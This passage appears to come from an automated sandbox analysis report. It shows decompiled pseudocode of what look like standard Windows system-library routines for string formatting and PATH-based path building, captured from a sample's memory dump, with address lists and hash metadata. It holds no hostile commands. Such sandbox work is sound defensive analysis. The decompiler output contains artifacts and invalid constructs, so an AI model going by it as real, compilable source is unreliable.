                                                                                                            						if(_t95 >= 0x200) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						E010AD000(0x80);
                                                                                                            						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                                                            						_t108 = _t115;
                                                                                                            						_t95 = _t95 - 0xffffff80;
                                                                                                            						_t17 = _t114 - 4;
                                                                                                            						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                                                            						__eflags =  *_t17;
                                                                                                            						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                            						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                                                            						_t102 = _t110 + 1;
                                                                                                            						do {
                                                                                                            							_t85 =  *_t110;
                                                                                                            							_t110 = _t110 + 1;
                                                                                                            							__eflags = _t85;
                                                                                                            						} while (_t85 != 0);
                                                                                                            						_t111 = _t110 - _t102;
                                                                                                            						_t21 = _t95 - 1; // -129
                                                                                                            						_t86 = _t21;
                                                                                                            						__eflags = _t111 - _t86;
                                                                                                            						if(_t111 > _t86) {
                                                                                                            							_t111 = _t86;
                                                                                                            						}
                                                                                                            						E010AF3E0(_t108, _t106, _t111);
                                                                                                            						_t115 = _t115 + 0xc;
                                                                                                            						_t103 = _t111 + _t108;
                                                                                                            						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                                                            						_t89 = _t95 - _t111;
                                                                                                            						__eflags = _t89;
                                                                                                            						_push(0);
                                                                                                            						if(_t89 == 0) {
                                                                                                            							L15:
                                                                                                            							_t109 = 0xc000000d;
                                                                                                            							goto L16;
                                                                                                            						} else {
                                                                                                            							__eflags = _t89 - 0x7fffffff;
                                                                                                            							if(_t89 <= 0x7fffffff) {
                                                                                                            								L16:
                                                                                                            								 *(_t114 - 0x94) = _t109;
                                                                                                            								__eflags = _t109;
                                                                                                            								if(_t109 < 0) {
                                                                                                            									__eflags = _t89;
                                                                                                            									if(_t89 != 0) {
                                                                                                            										 *_t103 = 0;
                                                                                                            									}
                                                                                                            									L26:
                                                                                                            									 *(_t114 - 0xa0) = _t109;
                                                                                                            									 *(_t114 - 4) = 0xfffffffe;
                                                                                                            									__eflags = _t109;
                                                                                                            									if(_t109 >= 0) {
                                                                                                            										L31:
                                                                                                            										_t98 = _t108;
                                                                                                            										_t39 = _t98 + 1; // 0x1
                                                                                                            										_t106 = _t39;
                                                                                                            										do {
                                                                                                            											_t69 =  *_t98;
                                                                                                            											_t98 = _t98 + 1;
                                                                                                            											__eflags = _t69;
                                                                                                            										} while (_t69 != 0);
                                                                                                            										_t99 = _t98 - _t106;
                                                                                                            										__eflags = _t99;
                                                                                                            										L34:
                                                                                                            										_t70 =  *[fs:0x30];
                                                                                                            										__eflags =  *((char*)(_t70 + 2));
                                                                                                            										if( *((char*)(_t70 + 2)) != 0) {
                                                                                                            											L40:
                                                                                                            											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                                                            											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                                                            											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                                                            											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                                                            											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                                                            											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                                                            											 *(_t114 - 4) = 1;
                                                                                                            											_push(_t114 - 0x74);
                                                                                                            											L010BDEF0(_t99, _t106);
                                                                                                            											 *(_t114 - 4) = 0xfffffffe;
                                                                                                            											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                            											goto L3;
                                                                                                            										}
                                                                                                            										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                                                            										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                                                            											goto L40;
                                                                                                            										}
                                                                                                            										_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                            										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                                                            										_push(_t99 & 0x0000ffff);
                                                                                                            										_push(_t108);
                                                                                                            										_push(1);
                                                                                                            										_t101 = E010AB280();
                                                                                                            										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                                                            										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                                                            											__eflags = _t101 - 0x80000003;
                                                                                                            											if(_t101 == 0x80000003) {
                                                                                                            												E010AB7E0(1);
                                                                                                            												_t101 = 0;
                                                                                                            												__eflags = 0;
                                                                                                            											}
                                                                                                            										}
                                                                                                            										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                                                            										goto L4;
                                                                                                            									}
                                                                                                            									__eflags = _t109 - 0x80000005;
                                                                                                            									if(_t109 == 0x80000005) {
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								 *(_t114 - 0x90) = 0;
                                                                                                            								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                                                            								_t91 = E010AE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                                                            								_t115 = _t115 + 0x10;
                                                                                                            								_t104 = _t91;
                                                                                                            								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                                                            								__eflags = _t104;
                                                                                                            								if(_t104 < 0) {
                                                                                                            									L21:
                                                                                                            									_t109 = 0x80000005;
                                                                                                            									 *(_t114 - 0x90) = 0x80000005;
                                                                                                            									L22:
                                                                                                            									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                                                            									L23:
                                                                                                            									 *(_t114 - 0x94) = _t109;
                                                                                                            									goto L26;
                                                                                                            								}
                                                                                                            								__eflags = _t104 - _t92;
                                                                                                            								if(__eflags > 0) {
                                                                                                            									goto L21;
                                                                                                            								}
                                                                                                            								if(__eflags == 0) {
                                                                                                            									goto L22;
                                                                                                            								}
                                                                                                            								goto L23;
                                                                                                            							}
                                                                                                            							goto L15;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					__eflags = _t109;
                                                                                                            					if(_t109 >= 0) {
                                                                                                            						goto L31;
                                                                                                            					}
                                                                                                            					__eflags = _t109 - 0x80000005;
                                                                                                            					if(_t109 != 0x80000005) {
                                                                                                            						goto L31;
                                                                                                            					}
                                                                                                            					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                                                            					_t38 = _t95 - 1; // -129
                                                                                                            					_t99 = _t38;
                                                                                                            					goto L34;
                                                                                                            				}
                                                                                                            				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                                                            					__eflags = __edx - 0x65;
                                                                                                            					if(__edx != 0x65) {
                                                                                                            						goto L2;
                                                                                                            					}
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				L2:
                                                                                                            				_push( *((intOrPtr*)(_t114 + 8)));
                                                                                                            				_push(_t106);
                                                                                                            				if(E010AA890() != 0) {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				goto L3;
                                                                                                            			}






















                                                                                                            0x010c4854
                                                                                                            0x010c4854
                                                                                                            0x010c4858
                                                                                                            0x010c485a
                                                                                                            0x010c485a
                                                                                                            0x010c485d
                                                                                                            0x010c485f
                                                                                                            0x010c4861
                                                                                                            0x010c4861
                                                                                                            0x010c4866
                                                                                                            0x010c486b
                                                                                                            0x010c486e
                                                                                                            0x010c4871
                                                                                                            0x010c4876
                                                                                                            0x010c4876
                                                                                                            0x010c4878
                                                                                                            0x010c487b
                                                                                                            0x010c4884
                                                                                                            0x010c4884
                                                                                                            0x00000000
                                                                                                            0x010c487d
                                                                                                            0x010c487d
                                                                                                            0x010c4882
                                                                                                            0x010c4889
                                                                                                            0x010c4889
                                                                                                            0x010c488f
                                                                                                            0x010c4891
                                                                                                            0x010c48e0
                                                                                                            0x010c48e2
                                                                                                            0x010c48e4
                                                                                                            0x010c48e4
                                                                                                            0x010c48e7
                                                                                                            0x010c48e7
                                                                                                            0x010c48ed
                                                                                                            0x010c48f4
                                                                                                            0x010c48f6
                                                                                                            0x010c4951
                                                                                                            0x010c4951
                                                                                                            0x010c4953
                                                                                                            0x010c4953
                                                                                                            0x010c4956
                                                                                                            0x010c4956
                                                                                                            0x010c4958
                                                                                                            0x010c4959
                                                                                                            0x010c4959
                                                                                                            0x010c495d
                                                                                                            0x010c495d
                                                                                                            0x010c495f
                                                                                                            0x010c495f
                                                                                                            0x010c4965
                                                                                                            0x010c4969
                                                                                                            0x010c49ba
                                                                                                            0x010c49ba
                                                                                                            0x010c49c1
                                                                                                            0x010c49c5
                                                                                                            0x010c49cc
                                                                                                            0x010c49d4
                                                                                                            0x010c49d7
                                                                                                            0x010c49da
                                                                                                            0x010c49e4
                                                                                                            0x010c49e5
                                                                                                            0x010c49f3
                                                                                                            0x010c4a02
                                                                                                            0x00000000
                                                                                                            0x010c4a02
                                                                                                            0x010c4972
                                                                                                            0x010c4974
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c4976
                                                                                                            0x010c4979
                                                                                                            0x010c4982
                                                                                                            0x010c4983
                                                                                                            0x010c4984
                                                                                                            0x010c498b
                                                                                                            0x010c498d
                                                                                                            0x010c4991
                                                                                                            0x010c4993
                                                                                                            0x010c4999
                                                                                                            0x010c499d
                                                                                                            0x010c49a2
                                                                                                            0x010c49a2
                                                                                                            0x010c49a2
                                                                                                            0x010c4999
                                                                                                            0x010c49ac
                                                                                                            0x00000000
                                                                                                            0x010c49b3
                                                                                                            0x010c48f8
                                                                                                            0x010c48fe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c48fe
                                                                                                            0x010c4895
                                                                                                            0x010c489c
                                                                                                            0x010c48ad
                                                                                                            0x010c48b2
                                                                                                            0x010c48b5
                                                                                                            0x010c48b7
                                                                                                            0x010c48ba
                                                                                                            0x010c48bc
                                                                                                            0x010c48c6
                                                                                                            0x010c48c6
                                                                                                            0x010c48cb
                                                                                                            0x010c48d1
                                                                                                            0x010c48d4
                                                                                                            0x010c48d8
                                                                                                            0x010c48d8
                                                                                                            0x00000000
                                                                                                            0x010c48d8
                                                                                                            0x010c48be
                                                                                                            0x010c48c0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c48c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c48c4
                                                                                                            0x00000000
                                                                                                            0x010c4882
                                                                                                            0x010c487b
                                                                                                            0x010c4904
                                                                                                            0x010c4906
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c4908
                                                                                                            0x010c490e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c4910
                                                                                                            0x010c4917
                                                                                                            0x010c4917
                                                                                                            0x00000000
                                                                                                            0x010c4917
                                                                                                            0x0106b1ba
                                                                                                            0x010c47f9
                                                                                                            0x010c47fc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010c47fc
                                                                                                            0x0106b1c0
                                                                                                            0x0106b1c0
                                                                                                            0x0106b1c3
                                                                                                            0x0106b1cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _vswprintf_s
                                                                                                            • String ID:
                                                                                                            • API String ID: 677850445-0
                                                                                                            • Opcode ID: 0f9ec09227dfedc9db09af164006598f9a996980a0bfd053566b6547ee7c9455
                                                                                                            • Instruction ID: 05fefaf1b9d41d31976d64d63c5e3876eafe40d7bfea409b52bec051be933c16
                                                                                                            • Opcode Fuzzy Hash: 0f9ec09227dfedc9db09af164006598f9a996980a0bfd053566b6547ee7c9455
                                                                                                            • Instruction Fuzzy Hash: F751A175D002698AEB758FA88854BEEBBF0FF04B10F1041ADD899DB282D7714945CF91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 84%
                                                                                                            			E01092581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912005) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v16;
                                                                                                            				unsigned int _v24;
                                                                                                            				void* _v28;
                                                                                                            				signed int _v32;
                                                                                                            				unsigned int _v36;
                                                                                                            				void* _v37;
                                                                                                            				signed int _v40;
                                                                                                            				signed int _v44;
                                                                                                            				signed int _v48;
                                                                                                            				signed int _v52;
                                                                                                            				signed int _v56;
                                                                                                            				intOrPtr _v60;
                                                                                                            				signed int _v64;
                                                                                                            				signed int _v68;
                                                                                                            				signed int _v72;
                                                                                                            				signed int _v76;
                                                                                                            				signed int _v80;
                                                                                                            				signed int _t233;
                                                                                                            				signed int _t237;
                                                                                                            				signed int _t238;
                                                                                                            				signed int _t239;
                                                                                                            				signed int _t243;
                                                                                                            				signed int _t245;
                                                                                                            				intOrPtr _t247;
                                                                                                            				signed int _t250;
                                                                                                            				signed int _t257;
                                                                                                            				signed int _t260;
                                                                                                            				signed int _t268;
                                                                                                            				intOrPtr _t274;
                                                                                                            				signed int _t276;
                                                                                                            				signed int _t278;
                                                                                                            				void* _t279;
                                                                                                            				signed int _t280;
                                                                                                            				unsigned int _t283;
                                                                                                            				signed int _t287;
                                                                                                            				signed int* _t288;
                                                                                                            				signed int _t289;
                                                                                                            				signed int _t293;
                                                                                                            				intOrPtr _t305;
                                                                                                            				signed int _t314;
                                                                                                            				signed int _t316;
                                                                                                            				signed int _t317;
                                                                                                            				signed int _t321;
                                                                                                            				signed int _t322;
                                                                                                            				void* _t324;
                                                                                                            				signed int _t325;
                                                                                                            				signed int _t327;
                                                                                                            				signed int _t330;
                                                                                                            				void* _t331;
                                                                                                            				void* _t333;
                                                                                                            
                                                                                                            				_t327 = _t330;
                                                                                                            				_t331 = _t330 - 0x4c;
                                                                                                            				_v8 =  *0x115d360 ^ _t327;
                                                                                                            				_push(__ebx);
                                                                                                            				_push(__esi);
                                                                                                            				_push(__edi);
                                                                                                            				_t321 = 0x115b2e8;
                                                                                                            				_v56 = _a4;
                                                                                                            				_v48 = __edx;
                                                                                                            				_v60 = __ecx;
                                                                                                            				_t283 = 0;
                                                                                                            				_v80 = 0;
                                                                                                            				asm("movsd");
                                                                                                            				_v64 = 0;
                                                                                                            				_v76 = 0;
                                                                                                            				_v72 = 0;
                                                                                                            				asm("movsd");
                                                                                                            				_v44 = 0;
                                                                                                            				_v52 = 0;
                                                                                                            				_v68 = 0;
                                                                                                            				asm("movsd");
                                                                                                            				_v32 = 0;
                                                                                                            				_v36 = 0;
                                                                                                            				asm("movsd");
                                                                                                            				_v16 = 0;
                                                                                                            				_t333 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                                                                            				_t274 = 0x48;
                                                                                                            				_t303 = 0 | _t333 == 0x00000000;
                                                                                                            				_t314 = 0;
                                                                                                            				_v37 = _t333 == 0;
                                                                                                            				if(_v48 <= 0) {
                                                                                                            					L16:
                                                                                                            					_t45 = _t274 - 0x48; // 0x0
                                                                                                            					__eflags = _t45 - 0xfffe;
                                                                                                            					if(_t45 > 0xfffe) {
                                                                                                            						_t322 = 0xc0000106;
                                                                                                            						goto L32;
                                                                                                            					} else {
                                                                                                            						_t321 = L01084620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
                                                                                                            						_v52 = _t321;
                                                                                                            						__eflags = _t321;
                                                                                                            						if(_t321 == 0) {
                                                                                                            							_t322 = 0xc0000017;
                                                                                                            							goto L32;
                                                                                                            						} else {
                                                                                                            							 *(_t321 + 0x44) =  *(_t321 + 0x44) & 0x00000000;
                                                                                                            							_t50 = _t321 + 0x48; // 0x48
                                                                                                            							_t316 = _t50;
                                                                                                            							_t303 = _v32;
                                                                                                            							 *((intOrPtr*)(_t321 + 0x3c)) = _t274;
                                                                                                            							_t276 = 0;
                                                                                                            							 *((short*)(_t321 + 0x30)) = _v48;
                                                                                                            							__eflags = _t303;
                                                                                                            							if(_t303 != 0) {
                                                                                                            								 *(_t321 + 0x18) = _t316;
                                                                                                            								__eflags = _t303 - 0x1158478;
                                                                                                            								 *_t321 = ((0 | _t303 == 0x01158478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                                            								E010AF3E0(_t316,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                                                                                                            								_t303 = _v32;
                                                                                                            								_t331 = _t331 + 0xc;
                                                                                                            								_t276 = 1;
                                                                                                            								__eflags = _a8;
                                                                                                            								_t316 = _t316 + (( *_t303 & 0x0000ffff) >> 1) * 2;
                                                                                                            								if(_a8 != 0) {
                                                                                                            									_t268 = E010F39F2(_t316);
                                                                                                            									_t303 = _v32;
                                                                                                            									_t316 = _t268;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_t287 = 0;
                                                                                                            							_v16 = 0;
                                                                                                            							__eflags = _v48;
                                                                                                            							if(_v48 <= 0) {
                                                                                                            								L31:
                                                                                                            								_t322 = _v68;
                                                                                                            								__eflags = 0;
                                                                                                            								 *((short*)(_t316 - 2)) = 0;
                                                                                                            								goto L32;
                                                                                                            							} else {
                                                                                                            								_t278 = _t321 + _t276 * 4;
                                                                                                            								_v56 = _t278;
                                                                                                            								do {
                                                                                                            									__eflags = _t303;
                                                                                                            									if(_t303 != 0) {
                                                                                                            										_t233 =  *(_v60 + _t287 * 4);
                                                                                                            										__eflags = _t233;
                                                                                                            										if(_t233 == 0) {
                                                                                                            											goto L30;
                                                                                                            										} else {
                                                                                                            											__eflags = _t233 == 5;
                                                                                                            											if(_t233 == 5) {
                                                                                                            												goto L30;
                                                                                                            											} else {
                                                                                                            												goto L22;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										L22:
                                                                                                            										 *_t278 =  *(_v60 + _t287 * 4);
                                                                                                            										 *(_t278 + 0x18) = _t316;
                                                                                                            										_t237 =  *(_v60 + _t287 * 4);
                                                                                                            										__eflags = _t237 - 8;
                                                                                                            										if(_t237 > 8) {
                                                                                                            											goto L56;
                                                                                                            										} else {
                                                                                                            											switch( *((intOrPtr*)(_t237 * 4 +  &M01092959))) {
                                                                                                            												case 0:
                                                                                                            													__ax =  *0x1158488;
                                                                                                            													__eflags = __ax;
                                                                                                            													if(__ax == 0) {
                                                                                                            														goto L29;
                                                                                                            													} else {
                                                                                                            														__ax & 0x0000ffff = E010AF3E0(__edi,  *0x115848c, __ax & 0x0000ffff);
                                                                                                            														__eax =  *0x1158488 & 0x0000ffff;
                                                                                                            														goto L26;
                                                                                                            													}
                                                                                                            													goto L108;
                                                                                                            												case 1:
                                                                                                            													L45:
                                                                                                            													E010AF3E0(_t316, _v80, _v64);
                                                                                                            													_t263 = _v64;
                                                                                                            													goto L26;
                                                                                                            												case 2:
                                                                                                            													 *0x1158480 & 0x0000ffff = E010AF3E0(__edi,  *0x1158484,  *0x1158480 & 0x0000ffff);
                                                                                                            													__eax =  *0x1158480 & 0x0000ffff;
                                                                                                            													__eax = ( *0x1158480 & 0x0000ffff) >> 1;
                                                                                                            													__edi = __edi + __eax * 2;
                                                                                                            													goto L28;
                                                                                                            												case 3:
                                                                                                            													__eax = _v44;
                                                                                                            													__eflags = __eax;
                                                                                                            													if(__eax == 0) {
                                                                                                            														goto L29;
                                                                                                            													} else {
                                                                                                            														__esi = __eax + __eax;
                                                                                                            														__eax = E010AF3E0(__edi, _v72, __esi);
                                                                                                            														__edi = __edi + __esi;
                                                                                                            														__esi = _v52;
                                                                                                            														goto L27;
                                                                                                            													}
                                                                                                            													goto L108;
                                                                                                            												case 4:
                                                                                                            													_push(0x2e);
                                                                                                            													_pop(__eax);
                                                                                                            													 *(__esi + 0x44) = __edi;
                                                                                                            													 *__edi = __ax;
                                                                                                            													__edi = __edi + 4;
                                                                                                            													_push(0x3b);
                                                                                                            													_pop(__eax);
                                                                                                            													 *(__edi - 2) = __ax;
                                                                                                            													goto L29;
                                                                                                            												case 5:
                                                                                                            													__eflags = _v36;
                                                                                                            													if(_v36 == 0) {
                                                                                                            														goto L45;
                                                                                                            													} else {
                                                                                                            														E010AF3E0(_t316, _v76, _v36);
                                                                                                            														_t263 = _v36;
                                                                                                            													}
                                                                                                            													L26:
                                                                                                            													_t331 = _t331 + 0xc;
                                                                                                            													_t316 = _t316 + (_t263 >> 1) * 2 + 2;
                                                                                                            													__eflags = _t316;
                                                                                                            													L27:
                                                                                                            													_push(0x3b);
                                                                                                            													_pop(_t265);
                                                                                                            													 *((short*)(_t316 - 2)) = _t265;
                                                                                                            													goto L28;
                                                                                                            												case 6:
                                                                                                            													__ebx = "\\WIw\\WIw";
                                                                                                            													__eflags = __ebx - "\\WIw\\WIw";
                                                                                                            													if(__ebx != "\\WIw\\WIw") {
                                                                                                            														_push(0x3b);
                                                                                                            														_pop(__esi);
                                                                                                            														do {
                                                                                                            															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                                            															E010AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                                            															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                                            															__edi = __edi + __eax * 2;
                                                                                                            															__edi = __edi + 2;
                                                                                                            															 *(__edi - 2) = __si;
                                                                                                            															__ebx =  *__ebx;
                                                                                                            															__eflags = __ebx - "\\WIw\\WIw";
                                                                                                            														} while (__ebx != "\\WIw\\WIw");
                                                                                                            														__esi = _v52;
                                                                                                            														__ecx = _v16;
                                                                                                            														__edx = _v32;
                                                                                                            													}
                                                                                                            													__ebx = _v56;
                                                                                                            													goto L29;
                                                                                                            												case 7:
                                                                                                            													 *0x1158478 & 0x0000ffff = E010AF3E0(__edi,  *0x115847c,  *0x1158478 & 0x0000ffff);
                                                                                                            													__eax =  *0x1158478 & 0x0000ffff;
                                                                                                            													__eax = ( *0x1158478 & 0x0000ffff) >> 1;
                                                                                                            													__eflags = _a8;
                                                                                                            													__edi = __edi + __eax * 2;
                                                                                                            													if(_a8 != 0) {
                                                                                                            														__ecx = __edi;
                                                                                                            														__eax = E010F39F2(__ecx);
                                                                                                            														__edi = __eax;
                                                                                                            													}
                                                                                                            													goto L28;
                                                                                                            												case 8:
                                                                                                            													__eax = 0;
                                                                                                            													 *(__edi - 2) = __ax;
                                                                                                            													 *0x1156e58 & 0x0000ffff = E010AF3E0(__edi,  *0x1156e5c,  *0x1156e58 & 0x0000ffff);
                                                                                                            													 *(__esi + 0x38) = __edi;
                                                                                                            													__eax =  *0x1156e58 & 0x0000ffff;
                                                                                                            													__eax = ( *0x1156e58 & 0x0000ffff) >> 1;
                                                                                                            													__edi = __edi + __eax * 2;
                                                                                                            													__edi = __edi + 2;
                                                                                                            													L28:
                                                                                                            													_t287 = _v16;
                                                                                                            													_t303 = _v32;
                                                                                                            													L29:
                                                                                                            													_t278 = _t278 + 4;
                                                                                                            													__eflags = _t278;
                                                                                                            													_v56 = _t278;
                                                                                                            													goto L30;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            									goto L108;
                                                                                                            									L30:
                                                                                                            									_t287 = _t287 + 1;
                                                                                                            									_v16 = _t287;
                                                                                                            									__eflags = _t287 - _v48;
                                                                                                            								} while (_t287 < _v48);
                                                                                                            								goto L31;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				} else {
                                                                                                            					while(1) {
                                                                                                            						L1:
                                                                                                            						_t237 =  *(_v60 + _t314 * 4);
                                                                                                            						if(_t237 > 8) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						switch( *((intOrPtr*)(_t237 * 4 +  &M01092935))) {
                                                                                                            							case 0:
                                                                                                            								__ax =  *0x1158488;
                                                                                                            								__eflags = __ax;
                                                                                                            								if(__ax != 0) {
                                                                                                            									__eax = __ax & 0x0000ffff;
                                                                                                            									__ebx = __ebx + 2;
                                                                                                            									__eflags = __ebx;
                                                                                                            									goto L53;
                                                                                                            								}
                                                                                                            								goto L14;
                                                                                                            							case 1:
                                                                                                            								L44:
                                                                                                            								_t303 =  &_v64;
                                                                                                            								_v80 = E01092E3E(0,  &_v64);
                                                                                                            								_t274 = _t274 + _v64 + 2;
                                                                                                            								goto L13;
                                                                                                            							case 2:
                                                                                                            								__eax =  *0x1158480 & 0x0000ffff;
                                                                                                            								__ebx = __ebx + __eax;
                                                                                                            								__eflags = __dl;
                                                                                                            								if(__dl != 0) {
                                                                                                            									__eax = 0x1158480;
                                                                                                            									goto L80;
                                                                                                            								}
                                                                                                            								goto L14;
                                                                                                            							case 3:
                                                                                                            								__eax = E0107EEF0(0x11579a0);
                                                                                                            								__eax =  &_v44;
                                                                                                            								_push(__eax);
                                                                                                            								_push(0);
                                                                                                            								_push(0);
                                                                                                            								_push(4);
                                                                                                            								_push(L"PATH");
                                                                                                            								_push(0);
                                                                                                            								L57();
                                                                                                            								__esi = __eax;
                                                                                                            								_v68 = __esi;
                                                                                                            								__eflags = __esi - 0xc0000023;
                                                                                                            								if(__esi != 0xc0000023) {
                                                                                                            									L10:
                                                                                                            									__eax = E0107EB70(__ecx, 0x11579a0);
                                                                                                            									__eflags = __esi - 0xc0000100;
                                                                                                            									if(__esi == 0xc0000100) {
                                                                                                            										_v44 = _v44 & 0x00000000;
                                                                                                            										__eax = 0;
                                                                                                            										_v68 = 0;
                                                                                                            										goto L13;
                                                                                                            									} else {
                                                                                                            										__eflags = __esi;
                                                                                                            										if(__esi < 0) {
                                                                                                            											L32:
                                                                                                            											_t211 = _v72;
                                                                                                            											__eflags = _t211;
                                                                                                            											if(_t211 != 0) {
                                                                                                            												L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
                                                                                                            											}
                                                                                                            											_t212 = _v52;
                                                                                                            											__eflags = _t212;
                                                                                                            											if(_t212 != 0) {
                                                                                                            												__eflags = _t322;
                                                                                                            												if(_t322 < 0) {
                                                                                                            													L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
                                                                                                            													_t212 = 0;
                                                                                                            												}
                                                                                                            											}
                                                                                                            											goto L36;
                                                                                                            										} else {
                                                                                                            											__eax = _v44;
                                                                                                            											__ebx = __ebx + __eax * 2;
                                                                                                            											__ebx = __ebx + 2;
                                                                                                            											__eflags = __ebx;
                                                                                                            											L13:
                                                                                                            											_t283 = _v36;
                                                                                                            											goto L14;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									__eax = _v44;
                                                                                                            									__ecx =  *0x1157b9c; // 0x0
                                                                                                            									_v44 + _v44 =  *[fs:0x30];
                                                                                                            									__ecx = __ecx + 0x180000;
                                                                                                            									__eax = L01084620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                                            									_v72 = __eax;
                                                                                                            									__eflags = __eax;
                                                                                                            									if(__eax == 0) {
                                                                                                            										__eax = E0107EB70(__ecx, 0x11579a0);
                                                                                                            										__eax = _v52;
                                                                                                            										L36:
                                                                                                            										_pop(_t315);
                                                                                                            										_pop(_t323);
                                                                                                            										__eflags = _v8 ^ _t327;
                                                                                                            										_pop(_t275);
                                                                                                            										return E010AB640(_t212, _t275, _v8 ^ _t327, _t303, _t315, _t323);
                                                                                                            									} else {
                                                                                                            										__ecx =  &_v44;
                                                                                                            										_push(__ecx);
                                                                                                            										_push(_v44);
                                                                                                            										_push(__eax);
                                                                                                            										_push(4);
                                                                                                            										_push(L"PATH");
                                                                                                            										_push(0);
                                                                                                            										L57();
                                                                                                            										__esi = __eax;
                                                                                                            										_v68 = __eax;
                                                                                                            										goto L10;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								goto L108;
                                                                                                            							case 4:
                                                                                                            								__ebx = __ebx + 4;
                                                                                                            								goto L14;
                                                                                                            							case 5:
                                                                                                            								_t270 = _v56;
                                                                                                            								if(_v56 != 0) {
                                                                                                            									_t303 =  &_v36;
                                                                                                            									_t272 = E01092E3E(_t270,  &_v36);
                                                                                                            									_t283 = _v36;
                                                                                                            									_v76 = _t272;
                                                                                                            								}
                                                                                                            								if(_t283 == 0) {
                                                                                                            									goto L44;
                                                                                                            								} else {
                                                                                                            									_t274 = _t274 + 2 + _t283;
                                                                                                            								}
                                                                                                            								goto L14;
                                                                                                            							case 6:
                                                                                                            								__eax =  *0x1155764 & 0x0000ffff;
                                                                                                            								goto L53;
                                                                                                            							case 7:
                                                                                                            								__eax =  *0x1158478 & 0x0000ffff;
                                                                                                            								__ebx = __ebx + __eax;
                                                                                                            								__eflags = _a8;
                                                                                                            								if(_a8 != 0) {
                                                                                                            									__ebx = __ebx + 0x16;
                                                                                                            									__ebx = __ebx + __eax;
                                                                                                            								}
                                                                                                            								__eflags = __dl;
                                                                                                            								if(__dl != 0) {
                                                                                                            									__eax = 0x1158478;
                                                                                                            									L80:
                                                                                                            									_v32 = __eax;
                                                                                                            								}
                                                                                                            								goto L14;
                                                                                                            							case 8:
                                                                                                            								__eax =  *0x1156e58 & 0x0000ffff;
                                                                                                            								__eax = ( *0x1156e58 & 0x0000ffff) + 2;
                                                                                                            								L53:
                                                                                                            								__ebx = __ebx + __eax;
                                                                                                            								L14:
